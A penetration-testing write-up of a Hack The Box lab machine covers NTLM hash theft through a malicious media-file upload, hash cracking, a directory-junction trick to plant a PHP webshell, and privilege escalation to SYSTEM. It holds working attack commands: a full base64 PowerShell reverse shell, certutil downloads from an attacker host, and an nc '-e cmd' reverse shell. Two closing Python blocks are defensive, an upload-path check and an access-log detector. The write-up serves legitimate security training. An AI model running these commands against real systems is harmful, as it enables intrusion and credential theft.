# Lessons Learned

- **When we see a `"we will get back to you shortly"` message associated with a file upload mechanism, assume that the uploaded file will be opened**
- **A writable dir can be symlinked to a non-writable dir**
  - A file placed in the writable dir will then be dumped into the non-writable one
- `icacls` is great for checking perms in Windows
- `nt authority\service account` should have `SeImpersonatePrivilege` by default
  - See [https://learn.microsoft.com/en-us/windows/win32/services/localservice-account](https://learn.microsoft.com/en-us/windows/win32/services/localservice-account)
- `FullPowers.exe` can be used to restore the full set of default privs for `nt authority\service account`
  - https://github.com/itm4n/FullPowers
- `EnableAllTokenPrivs.ps1` can be used to enable all currently disabled privs
  - https://github.com/fashionproof/EnableAllTokenPrivs
  - https://medium.com/@markmotig/enable-all-token-privileges-a7d21b1a4a77
- We can feed a PowerShell revshell to a simple cmd-type PHP webshell
  - The revshell may need to be base64 encoded, and then the `powershell -e base64_blob` portion may need to be URL encoded
  - We could also have used the webshell to upload an `msfvenom` payload, then used the webshell to execute the payload to get a revshell or meterpreter shell (depending on the `msfvenom` payload)
- `SeTcbPrivilege` is very much abusable
  - Next time, use: [CharminDoge/tcb-lpe: SeTcbPrivilege Local Privilege Escalation Exploit](https://github.com/CharminDoge/tcb-lpe)

---

# After-Action Attack Sequence

- File upload functionality wrt the Apache webserver
  - Upload a Windows Media Player compatible test file
  - Notice that someone will get back to us shortly; presume based on this that the file will be clicked on
  - Use `ntlm_theft.py` to generate a `.wax` file and upload it
  - Listen for an NTLMv2 hash using `sudo resp -I tun0`
  - Crack the NTLMv2 hash with `hashcat -m 5600`
- Connect to the box with SSH as `enox`
  - Look over `review.ps1` available in `\users\enox\documents`
  - Review `httpd.conf` in `\xampp\apache\config`
  - Review `index.php` in `\xampp\htdocs`
    - Here we notice the files are being uploaded to `\windows\tasks\uploads`, in a folder whose name is the md5 hash of the supplied `first_name.last_name.email` > `[email protected]` = `44b85c98e94039c8a0a015f6d3a3449e`
  - `enox` has RW access to `\windows\tasks` but not `\xampp\htdocs`
  - Clear out the existing dir `44b85c98e94039c8a0a015f6d3a3449e` in `\windows\tasks\uploads`
  - Create a symlink from `\windows\tasks\uploads\44b85c98e94039c8a0a015f6d3a3449e` to `\xampp\htdocs`
  - Upload a simple GET or REQUEST PHP webshell > `shell.php`
  - Confirm that our symlink caused the webshell to be dropped into `\xampp\htdocs`
  - Test the webshell with `curl http://media.htb/shell.php?cmd=whoami`
    - Here we see that the webserver is running as `nt authority\local service`
    - According to [https://learn.microsoft.com/en-us/windows/win32/services/localservice-account](https://learn.microsoft.com/en-us/windows/win32/services/localservice-account), this account should have `SeImpersonatePrivilege`
- Connect to the box as `nt authority\local service`
  - Feed the webshell a URL-encoded command with a PowerShell revshell encoded as a base64 blob
  - Grab the base64 PowerShell revshell from [revshells.com](http://revshells.com/)
  - Use the following command: `curl http://media.htb/shell2.php?cmd="powershell%20-e%20[base64_blob]"`
  - From here, use `FullPowers.exe` to activate `SeImpersonatePrivilege` for `nt authority\local service`
    - We could also abuse `SeTcbPrivilege`
- Connect to the box as `nt authority\system`
  - Use `GodPotato-NET4.exe` to open a revshell as `nt authority\system`

---

# Discover Ports & Services

- `ping` test
![[images/Pasted image 20260401144758.png]]
  - Windows based on TTL
- `nmap` scan - light
![[images/Pasted image 20260401144904.png]]
- `nmap` scan - detailed
![[images/Pasted image 20260401145416.png]]
- `nmap` scan - UDP
![[images/Pasted image 20260401145804.png]]

---

# Service Enum

## Port 80 (HTTP): Apache 2.4.56; PHP 8.1.17

### Initial review

- Visit page
![[images/Pasted image 20260401145035.png]]
  - Not much to see here
- View source
![[images/Pasted image 20260401151031.png]]
- request:response in `burp`
![[images/Pasted image 20260401151149.png]]
- A few names
![[images/Pasted image 20260401145214.png]]
- File upload button may work? > asks for a video file (compatible with Windows Media Player)
![[images/Pasted image 20260401145200.png]]

### Web fuzzing

- Try `feroxbuster`
  - `feroxbuster` uses `raft-medium` by default but this can be changed
  - This is a lot of output
```bash
feroxbuster -u http://10.129.13.168
```
![[images/Pasted image 20260401150050.png]]
- Directory fuzzing
  - `raft-medium`
![[images/Pasted image 20260401150339.png]]
    - `assets` shows the explorer for all images > nothing useful
![[images/Pasted image 20260401150713.png]]
  - `2.3-medium` > nothing new
![[images/Pasted image 20260401150920.png]]
- Subdomain fuzzing
  - `top1million-20000` > nothing
![[images/Pasted image 20260401151513.png]]
- VHost fuzzing
  - `top1million-20000`

### Other Checks

- Try `index.html` > default 404
- Try `index.php` > drops us to the home page
- Try a random page > default 404
![[images/Pasted image 20260401150529.png]]
- No `robots.txt` and no `sitemap.xml`
- `whatweb` scan
![[images/Pasted image 20260401151410.png]]
- `searchsploit` for the apache and php versions
  - Nothing for `apache` 2.4.56
  - php 8.1.17 may have an exploit?
![[images/Pasted image 20260401151856.png]]

### PHP 8.1.17

- Review `php/webapps/52047.py`
  - Associated with `CVE-2024-4577`
![[images/Pasted image 20260401152205.png]]
  - Takes URL and command arguments
- Getting errors
![[images/Pasted image 20260401153057.png]]
- Try a different command > returns the home page
```bash
python3 52047.py http://10.129.13.168 dir
```
![[images/Pasted image 20260401153839.png]]
- Try https://github.com/watchtowrlabs/CVE-2024-4577
  - Getting errors regarding the command
```bash
python exploit.py --target http://10.129.13.168/index.php -c "<?php system('calc');?>"
```

---

# File Upload Attack

## Attempt 1: Generate Custom AVI File with PHP Echo Test

- Create an AVI file with the proper magic bytes that includes `<?php echo "Hello";?>` as a test
  - Use an online converter to convert hex `52 49 46 46 ?? ?? ?? ?? 41 56 49 20` to ASCII
  - View with `xxd` and check with `file`
![[images/Pasted image 20260401194957.png]]
- Attempt to upload > recognized as an `.avi`
![[images/Pasted image 20260401195124.png]]
- Looks like it was successful
![[images/Pasted image 20260401195155.png]]
- View request:response in `burp`
![[images/Pasted image 20260401195616.png]]
- Where was it uploaded?
- Try again with `cmd`
![[images/Pasted image 20260401195818.png]]
- Upload successful > try appending `?cmd=id` to the root dir > nothing
![[images/Pasted image 20260401195956.png]]

## Attempt 2: Generate Custom WAX File with `ntlm_theft.py`

- The alert indicated that someone will review and get back to us
  - We can presume that it will be opened on the webserver
  - Because we are targeting a Windows box, maybe we can leak an NTLM hash
- Use `ntlm_theft.py` from [Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)](https://github.com/Greenwolf/ntlm_theft)
- Let's look at the options
![[images/Pasted image 20260401201510.png]]
  - There are only so many extension options: which are compatible with Windows Media Player?
  - Looks like asx, wax, or m3u may work based on some googling, as they are AV-type files
- Let's try `.wax`
![[images/Pasted image 20260401202533.png]]
- Run `sudo responder -I tun0` and upload the `.wax`
- Upload successful
![[images/Pasted image 20260401202635.png]]
- And we got an NTLM hash for `enox`
![[images/Pasted image 20260401202704.png]]
  - Looks like NTLMv2 based on `hashid`
![[images/Pasted image 20260401202758.png]]
- Attempt to crack with `hashcat -m 5600`
  - We have creds for `enox`
![[images/Pasted image 20260401203012.png]]

---

# Foothold as `enox`

## Connect with RDP

- Confirm creds with `nxc rdp` because port 3389 was open
![[images/Pasted image 20260401203413.png]]
  - This seems like it might be an old Windows box
- Having issues connecting with both `xfreerdp3` and `rdesktop`
![[images/Pasted image 20260401204802.png]]
![[images/Pasted image 20260401204742.png]]
  - Looks like it wants a Kerberos TGT. This is odd because we saw no signs of a DC, like ports 88, 389, 636, 5985, etc. being open

## Connect with SSH

- Also try creds with `nxc ssh` because port 22 was open
![[images/Pasted image 20260401204627.png]]
- Let's SSH into the box with our creds for `enox`
  - We are in > not much to work with in terms of groups and privs
![[images/Pasted image 20260401205206.png]]
- Browse docs accessible to `enox`
  - There is a script in `\users\enox\documents` entitled `review.ps1`
![[images/Pasted image 20260401211733.png]]
- Since we know there was a webserver, let's look at Apache's `httpd.conf` and the PHP files
  - Navigate to `\xampp`
![[images/Pasted image 20260401210047.png]]
  - Navigate to `\xampp\apache\config` and `type httpd.conf`
  - Navigate to `\xampp\htdocs` to view the PHP files
  - Type `index.php`
![[images/Pasted image 20260401210329.png]]
    - Upload dir = `\windows\tasks\uploads`, where the folder name is an md5 hash of `first_name.last_name.email`
    - A bit odd that the upload location is not in `\xampp\htdocs` or elsewhere in `\xampp`
    - Also, this `todo.txt` may be linked to the script we found earlier
- Move `winPEASx64.exe` to the box with `scp`
```bash
scp /opt/winPEASx64.exe [email protected]:/users/enox/desktop/winpeas.exe
```
![[images/Pasted image 20260401211354.png]]
- Let's save the output to a file and exfil it for review on Kali
```powershell
# on the target
winpeas.exe > results.txt
# back on Kali
scp [email protected]:/users/enox/desktop/results.txt ~/Documents/htb/boxes/media/results.txt
```
- Oddest thing that jumped out at me
![[images/Pasted image 20260401213223.png]]

### Simple webshell by symlinking `\windows\tasks\uploads` to `\xampp\htdocs`

- Confirm access to `\windows\tasks\uploads`
```powershell
icacls "c:\windows\tasks\uploads"
Get-Acl -Path "c:\windows\tasks\uploads" | Format-Table -Wrap
```
![[images/Pasted image 20260402182421.png]]
- Clear out the md5 folder for `[email protected]`
  - Note the md5 hash: `44b85c98e94039c8a0a015f6d3a3449e`
![[images/Pasted image 20260402183645.png]]
- Make a symlink to `\xampp\htdocs` and confirm
```powershell
# /J creates an NTFS directory junction; unlike a /D symlink it needs no SeCreateSymbolicLinkPrivilege
cmd /c mklink /J C:\Windows\Tasks\Uploads\44b85c98e94039c8a0a015f6d3a3449e C:\xampp\htdocs
ls .\Windows\Tasks\Uploads\44b85c98e94039c8a0a015f6d3a3449e\
```
![[images/Pasted image 20260402183819.png]]
![[images/Pasted image 20260402183826.png]]
- Now when we upload a simple PHP webshell as `shell2.php` it will be placed in `htdocs` and accessible from `\shell2.php?cmd=whoami`
- Upload `shell2.php`
![[images/Pasted image 20260402184116.png]]
- Check `\xampp\htdocs`
![[images/Pasted image 20260402184127.png]]
- Now hit the webshell
  - Works!
![[images/Pasted image 20260402184439.png]]
- Let's use `curl` instead and URL encode `whoami /all` with `cyberchef.org`
![[images/Pasted image 20260402184526.png]]
  - As we see above, `nt authority\local service` has the `SeTcbPrivilege` privilege but it's disabled

---

# Revshell for access as `nt authority\local service`

## Attempt 1: Discrete `revshell.php`

- Let's upload a PHP revshell
![[images/Pasted image 20260402193954.png]]
  - https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
  - That uploaded to `htdocs` but did not hit the listener

## Attempt 2: Feed the original webshell a base64 encoded PowerShell command

- Let's get a revshell by providing a base64 encoded PowerShell command as data to our webshell
  - Use `revshells.com` to generate the base64 blob
```bash
curl http://media.htb/shell2.php --data-urlencode 'cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'
```
- I'm getting a deprecation related error
![[images/Pasted image 20260402195855.png]]

## Attempt 3: Feed the original webshell a base64 encoded PowerShell command with URL encoding

- Let's URL encode the portion associated with `"powershell -e [base64_blob]"` and retry with the below
```bash
curl http://media.htb/shell2.php?cmd="powershell%20-e%20[base64_blob]"
```
- That worked!
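The junction trick in the foothold section works because the upload handler trusts whatever already sits under `\windows\tasks\uploads`. As an added defensive example (not code from the page or the box's `index.php`), the handler below derives the same md5 folder name and refuses to write through a symlink, junction, or anything that resolves outside the upload root; the users, emails and temp layout in `demo()` are constructed.

```python
import hashlib
import stat
import tempfile
from pathlib import Path


def upload_subdir_name(first_name: str, last_name: str, email: str) -> str:
    """Folder name the page's handler derives: md5 of 'first_name.last_name.email'."""
    return hashlib.md5(f"{first_name}.{last_name}.{email}".encode()).hexdigest()


def is_reparse_point(path: Path) -> bool:
    """True for a symlink on any OS (even a dangling one) and for an NTFS junction on Windows."""
    if path.is_symlink():
        return True
    if not path.exists():
        return False
    attrs = getattr(path.lstat(), "st_file_attributes", 0)  # only populated on Windows
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0))


def resolve_upload_dir(upload_root, first_name: str, last_name: str, email: str) -> Path:
    """Return the per-user upload dir, refusing one that is a link/junction or whose
    real location lies outside upload_root (the Tasks\\Uploads -> htdocs redirection)."""
    root = Path(upload_root).resolve()
    target = root / upload_subdir_name(first_name, last_name, email)
    if is_reparse_point(target):
        raise PermissionError(f"refusing reparse point in upload root: {target}")
    real = target.resolve()
    if real != root and root not in real.parents:
        raise PermissionError(f"{target} resolves outside {root}")
    real.mkdir(exist_ok=True)
    return real


def demo() -> dict:
    """Constructed layout (hypothetical users, not the page's): one honest upload folder and
    one folder replaced by a link to a web root, as enox did with the md5 folder."""
    base = Path(tempfile.mkdtemp())
    root, webroot = base / "uploads", base / "htdocs"
    root.mkdir()
    webroot.mkdir()
    honest = resolve_upload_dir(root, "jane", "doe", "jane@example.test")
    linked = root / upload_subdir_name("john", "doe", "john@example.test")
    linked.symlink_to(webroot, target_is_directory=True)  # stands in for mklink /J
    try:
        resolve_upload_dir(root, "john", "doe", "john@example.test")
        verdict = "allowed"
    except PermissionError:
        verdict = "rejected"
    return {"honest_inside_root": honest.parent == root.resolve(), "linked_folder": verdict}
```

The check is still racy if the upload root stays writable by a low-privilege user (a junction can be created between the check and the write), so the durable fix on this box is also to stop `enox` having RW on `\windows\tasks`.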
![[images/Pasted image 20260402201144.png]]

---

# Privesc

- Let's find a way to enable `SeTcbPrivilege` and abuse it to privesc

## Attempt 1: `seTcb.exe`

- https://github.com/mSameerMalik/SeTcbPrivilege_escalation/
![[images/Pasted image 20260402201415.png]]
  - This tool also automatically enables the priv
- First, move `seTcb.exe` to the target
  - Note `service account` does not have access to `\windows\temp` or `\users\public` but does have access to `\xampp`
```bash
mkdir www && cd www
# a github.com/.../blob/... URL returns the HTML page, not the binary; fetch the raw URL (raw.githubusercontent.com or ?raw=true) to get the file itself
wget https://github.com/mSameerMalik/SeTcbPrivilege_escalation/blob/main/seTcb.exe
python3 -m http.server
```
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/seTcb.exe \xampp\htdocs\setcb.exe
```
- Second, add `enox` to the administrators group
  - Fails to add `enox` to administrators
  - Maybe we need to specify a service other than `group`
```powershell
.\setcb.exe group "cmd /c net localgroup administrators enox /add"
```

## Attempt 2: `TcbElevation-x64.exe`

- https://github.com/b4lisong/SeTcbPrivilege-Abuse
  - Looks like we need to enable the priv
- First, enable `SeTcbPrivilege` with [fashionproof/EnableAllTokenPrivs](https://github.com/fashionproof/EnableAllTokenPrivs/tree/master)
  - Move to the target and run > Enabled!
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/enablealltokenprivs.ps1 \xampp\htdocs\enableall.ps1
```
![[images/Pasted image 20260402204121.png]]
- Second, download `TcbElevation-x64.exe` and `nc64.exe`, then move them to the target
![[images/Pasted image 20260402204455.png]]
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/nc64.exe \xampp\htdocs\nc64.exe
certutil.exe -urlcache -split -f http://10.10.14.197:8000/TcbElevation-x64.exe \xampp\htdocs\TcbElevation-x64.exe
```
- Third, set up a listener on Kali and run the tool on the target as below
```powershell
.\TcbElevation-x64.exe run54 "C:\Windows\system32\cmd.exe /c C:\xampp\htdocs\nc64.exe -e cmd 10.10.14.197 4445"
```
  - Nothing on the listener
![[images/Pasted image 20260402205448.png]]

## Attempt 3: Run `FullPowers.exe` for `SeImpersonatePrivilege`, then run `GodPotato.exe`

- Download `FullPowers.exe` and `GodPotato` on Kali
![[images/Pasted image 20260402211342.png]]
  - To check the `.NET` version, use the below command
```cmd
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s
```
- Move to the target with `certutil`
```powershell
certutil.exe -urlcache -split -f http://10.10.14.197:8000/FullPowers.exe \xampp\htdocs\FullPowers.exe
certutil.exe -urlcache -split -f http://10.10.14.197:8000/GodPotato-NET4.exe \xampp\htdocs\GodPotato-NET4.exe
```
![[images/Pasted image 20260402211449.png]]
- Run `FullPowers.exe` to create a revshell
```powershell
.\FullPowers.exe -c "powershell -e [base64_blob]"
```
  - Now we have full powers
![[images/Pasted image 20260402211902.png]]
- Run `GodPotato` for yet another revshell as below
```powershell
.\GodPotato-NET4.exe -cmd "powershell -e [base64_blob]"
```
- There we go!
![[images/Pasted image 20260402213020.png]]
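Every `shell2.php?cmd=...` request used in this writeup, including the URL-encoded `powershell -e` blob, lands verbatim in Apache's access log. As an added detection example (not from the page), the following parses constructed combined-format log lines, flags requests that carry a command in a `cmd`-style parameter, and decodes the UTF-16LE base64 that `powershell -e` expects so an analyst can read what was run; the client IPs, timestamps and the blob (which encodes `whoami`) are constructed.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (hypothetical clients/timestamps, not the page's box).
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2026:18:44:39 +0000] "GET /shell2.php?cmd=whoami HTTP/1.1" 200 58 "-" "curl/8.5.0"
10.0.0.5 - - [02/Apr/2026:20:11:44 +0000] "GET /shell2.php?cmd=powershell%20-e%20dwBoAG8AYQBtAGkA HTTP/1.1" 200 12 "-" "curl/8.5.0"
10.0.0.9 - - [02/Apr/2026:20:12:01 +0000] "GET /index.php HTTP/1.1" 200 2291 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SUSPECT_PARAMS = {"cmd", "exec", "command"}  # parameter names one-line PHP shells commonly use
ENCODED_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)  # accepted prefixes of -EncodedCommand


def decode_encoded_powershell(blob: str):
    """Decode a `powershell -e` argument: base64 of the script text in UTF-16LE. None if it is not one."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_target(target: str):
    """Flag a request whose query carries an OS command; decode it when it is an encoded PowerShell one."""
    # parse_qs percent-decodes, so this assumes the blob was percent-encoded in the request, as on the page.
    for param, values in parse_qs(urlsplit(target).query).items():
        for value in values:
            tokens = value.split()
            decoded = None
            if len(tokens) >= 3 and tokens[0].lower() in ("powershell", "powershell.exe", "pwsh") \
                    and ENCODED_FLAG.match(tokens[1]):
                decoded = decode_encoded_powershell(tokens[2])
            if tokens and (param.lower() in SUSPECT_PARAMS or decoded is not None):
                return {"param": param, "command": value, "decoded": decoded}
    return None


def scan_log(text: str) -> list:
    """Run inspect_target over each access-log line; return findings with client, time and status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        hit = inspect_target(m["target"]) if m else None
        if hit:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], **hit})
    return findings
```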